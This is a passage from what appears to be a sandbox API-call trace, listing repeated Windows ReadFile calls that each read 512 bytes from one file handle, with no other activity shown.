lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, 
lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.873] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.874] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.874] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.874] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.874] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.874] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.874] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.874] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.874] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: 
lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.874] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.874] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.874] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.874] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.874] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, 
lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.877] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.877] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.877] ReadFile (in: hFile=0x54, 
lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.877] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.877] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.877] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.877] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.877] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.877] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.877] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.877] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.877] ReadFile 
(in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.877] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.878] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.878] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.878] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.878] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.878] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.878] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.878] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 
[0111.878] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.878] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.878] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.878] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.878] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.878] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.879] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.879] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.879] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, 
lpOverlapped=0x0) returned 1 [0111.879] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.879] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.879] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.879] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.879] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.879] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.940] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.940] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.940] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, 
lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.940] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.940] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.940] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.940] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.940] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.940] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.940] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.940] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.940] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: 
lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.941] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.941] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.941] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.941] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.941] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.941] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.941] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.941] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, 